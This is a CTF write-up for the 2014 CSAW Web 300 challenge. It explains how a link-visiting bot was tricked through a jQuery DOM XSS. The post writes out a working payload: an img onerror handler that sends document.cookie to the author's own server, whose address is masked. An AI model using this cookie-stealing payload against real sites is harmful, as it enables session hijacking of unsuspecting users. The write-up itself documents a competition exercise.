2014 CSAW Qualifying CTF - Web 300

Written by: Justin G.

When you visit the IP address you are presented with this website.

Before any hints were given, I figured that the "bot" will go and visit any link sent to it from the website. I decided to test this so I sent it a link to a website that I own and looked at the logs. I was able to confirm that the bot visited my site, and it didn't care about what file type you sent it. Now we have to figure out what we're after and how we're going to get it.

On this challenge the goal was to grab the cookie(s), they eventually gave a hint, now how do we do it. My first thought was to do some XSS (Cross Site Scripting). Since the bot acts like a user we would need it to visit a maliciously crafted link. After a quick search I found this site http://ma.la/jquery_xss/. Screenshot bellow, if you don't trust me.

Their example link looks like this: http://ma.la/jquery_xss/#<img src=/ onerror=alert(1)>
When this link is clicked it reloads the page and an alert pops up with 1 on it.

Now we have to craft a link using this method to send to the bot, at this point I had no idea if this was going to work. This is the link I crafted:<img src=/ onerror="window.location = 'http://xxx.xxx/300Save.php?' + document.cookie">
Let me explain what this link does. When the bot visits the link it will try to call an image that is not there and will then run the JavaScript in the onerror action. The bot will be redirected to a website that I own and will send the document.cookie to the URL I specified.

To get the key I now just have to look at the logs of my webserver.